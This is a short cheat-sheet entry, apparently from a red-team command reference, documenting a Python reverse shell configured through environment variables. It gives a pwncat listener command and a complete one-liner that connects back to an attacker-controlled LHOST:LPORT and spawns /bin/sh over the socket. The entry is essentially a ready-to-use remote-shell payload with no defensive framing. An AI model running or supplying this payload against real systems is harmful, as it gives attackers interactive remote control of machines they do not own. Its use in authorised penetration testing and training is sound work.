# python env

[TOC]

## Vars

| Variable | Value     | Description |
| -------- | --------- | ----------- |
| LHOST    | {{LHOST}} | The IP the target will connect to |
| LPORT    | {{LPORT}} | The port the target will connect to |

## Description

Python reverse shell that reads arguments from environment variables. TCP, Unix only.

## Commands

### Red: Create Listener

```bash
autovnet rtfm pwncat -n {{LHOST}} {{LPORT}}
```

### Blue: Throw Reverse Shell

```bash
export LHOST="{{LHOST}}";export LPORT={{LPORT}};python -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("LHOST"),int(os.getenv("LPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
```
